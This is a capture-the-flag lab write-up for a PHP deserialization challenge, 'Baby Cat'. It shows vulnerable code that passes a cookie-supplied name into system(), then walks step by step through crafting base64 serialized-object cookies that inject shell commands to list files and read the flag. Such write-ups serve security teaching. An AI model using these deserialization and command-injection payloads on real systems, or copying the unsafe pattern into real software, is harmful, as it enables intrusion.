Simple Web 0x17(Lab - Baby Cat)

Posted on | Post modified | In |

Simple Web 0x17(Lab - Baby Cat)

tags: NTUSTWS CTF Web

Challenge: http://h4ck3r.quest:8601/

Background

0x16.5(php unserialize)

Source code

:::spoiler code

<?php
isset($_GET['source']) && die(!show_source(__FILE__));

class Cat
{
    public $name = '(guest cat)';
    function __construct($name)
    {
        $this->name = $name;
    }
    function __wakeup()
    {
        echo "<pre>";
        system("cowsay 'Welcome back, $this->name'");
        echo "</pre>";
    }
}

if (!isset($_COOKIE['cat_session'])) {
    $cat = new Cat("cat_" . rand(0, 0xffff));
    setcookie('cat_session', base64_encode(serialize($cat)));
} else {
    $cat = unserialize(base64_decode($_COOKIE['cat_session']));
}
?>
<p>Hello, <?= $cat->name ?>.</p>
<a href="/?source">source code</a>

:::

Exploit - deserialize

  1. Use psysh to test payload In local side, if you haven’t install cowsay, the payload should be '||ls -al' 
     $ ./psysh
 > system("cowsay 'Welcome back, '||pwd''");
 sh: 1: cowsay: not found
 /home/sbk6401
 = "/home/sbk6401"
  2. Construct testing case 
     $ ./psysh
 > class Cat{
 . public $name = '(guest cat)';
 . function __construct($name){$this->name = $name;}
 . function __wakeup(){system("cowsay 'Welcome back, $this->name'");}}
 > $cat = new Cat("'&&ls -al /'")
 = Cat {#2785
     +name: "'&&ls -al /'",
   }

 > base64_encode(serialize($cat))
 = "TzozOiJDYXQiOjE6e3M6NDoibmFtZSI7czoxMjoiJyYmbHMgLWFsIC8nIjt9"

    Then changecat_session to TzozOiJDYXQiOjE6e3M6NDoibmFtZSI7czoxMjoiJyYmbHMgLWFsIC8nIjt9 and we’ll get the response

  3. Get flag 
     > $cat = new Cat("'&&cat /flag_5fb2acebf1d0c558'")
 = Cat {#2789
     +name: "'&&cat /flag_5fb2acebf1d0c558'",
   }

 > base64_encode(serialize($cat))
 = "TzozOiJDYXQiOjE6e3M6NDoibmFtZSI7czozMDoiJyYmY2F0IC9mbGFnXzVmYjJhY2ViZjFkMGM1NTgnIjt9"

    Again! Modify cat_session to TzozOiJDYXQiOjE6e3M6NDoibmFtZSI7czozMDoiJyYmY2F0IC9mbGFnXzVmYjJhY2ViZjFkMGM1NTgnIjt9 then we’ll get flag